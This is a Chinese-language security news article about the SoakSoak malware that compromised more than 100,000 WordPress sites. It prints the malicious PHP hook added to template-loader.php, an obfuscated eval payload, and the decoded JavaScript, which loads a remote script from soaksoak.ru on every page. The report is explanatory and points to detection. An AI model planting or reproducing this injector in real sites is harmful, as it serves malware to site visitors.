恶意软件SoakSoak感染超10万WordPress网站

安全
近几个月,WordPress安全漏洞事件频发,包括免费主题暗藏后门,波及WordPress等知名CMS系统,WordPress 4.0以下版本存在跨站脚本漏洞。而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。

WordPress是一款使用PHP语言开发的博客平台,用户架设属于自己的博客,也可以把WordPress当作一个内容管理系统(CMS)来使用。近几个月,WordPress安全漏洞事件频发,包括免费主题暗藏后门,波及WordPress等知名CMS系统,WordPress 4.0以下版本存在跨站脚本漏洞。而现在,一款广泛传播的恶意软件已经感染了100,000多个WordPress网站,而且数字仍在增加。

恶意软件SoakSoak感染超10万WordPress网站

Google将超过11,000个域名纳入黑名单

消息先是周日早上在WordPress社区传播,起因是Google将超过11,000域名列入黑名单,这些网站都被一款最新的恶意软件攻击,软件来源于SoakSoak.ru,所以起名为SoakSoak 恶意软件。由于现在互联网上有超过7亿网站使用WordPress,所以这样的恶意软件影响巨大。

一经感染,网站就会出现异常行为,包括重定向到SoakSoak.ru。访问网站的用户也可能会自动下载恶意程序。Google已经将11,000个可能已经感染病毒的网站列入黑名单。

恶意软件SoakSoak感染超10万WordPress网站

恶意软件分析

恶意软件SoakSoak会修改wp-includes/template-loader.php文件

  1. <?php  
  2. function FuncQueueObject()  
  3. {  
  4.   wp_enqueue_script("swfobject");  
  5. }  
  6. add_action("wp_enqueue_scripts",'FuncQueueObject'); 

这样使得wp-includes/js/swobject.js文件会在每一个页面上加载,这个swobject.js文件包含加密的恶意js代码。

  1. eval(decodeURIComponent   
  2. ("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B")); 

解密后的代码:

  1. eval(decodeURIComponent('(  
  2. function()  
  3. {  
  4.     //var ua = navigator.userAgent.toLowerCase();  
  5.     //if (ua.indexOf('chrome') != -1) return;  
  6.     var head=document.getElementsByTagName('head')[0];  
  7.     var script=document.createElement('script');  
  8.     script.type='text/javascript';  
  9.     script.src='http://soaksoak.ru/xteas/code';  
  10.     script.id='xxyyzz_petushok';  
  11.     head.appendChild(script);  
  12. }()  
  13. );')); 

恶意代码一旦被解密,就会加载SoakSoak.ru域名中的js:hxxp://soaksoak.ru/xteas/code

检测与预防

目前尚不清楚病毒是如何感染网站的。如果你正在使用WordPress,并且你担心你的网站被感染,Sucuri公司提供了免费网站扫描,你可以检测你的网站是否感染了病毒。

恶意软件SoakSoak感染超10万WordPress网站

想要让你的WordPress更加安全,可参见:如何为WordPress做安全防护?

参考来源:THN & Sucuri

责任编辑:蓝雨泪 来源: FreeBuf
相关推荐

2013-04-16 17:15:37

移动恶意软件恶意软件Android

2015-02-09 10:14:33

2014-12-30 10:33:45

2021-04-02 12:58:50

WordPress恶意软件jQuery Migr

2021-12-29 12:49:02

恶意软件joker攻击

2017-01-17 16:01:13

2023-08-18 10:14:27

2023-10-27 12:14:24

2014-10-08 09:54:04

恶意软件iWormMac

2012-07-09 08:46:44

Android病毒

2014-11-04 09:40:27

2019-12-11 07:29:34

恶意软件漏洞攻击

2023-05-30 20:25:38

2023-05-31 13:00:34

2012-04-23 09:35:27

2016-09-07 12:44:43

2019-02-19 12:29:51

2021-10-06 13:57:41

恶意软件GriftHorse网络攻击

2011-05-17 17:30:38

微软Windows 7恶意软件

2022-01-20 08:19:18

恶意软件DDoS网络攻击
点赞
收藏

51CTO技术栈公众号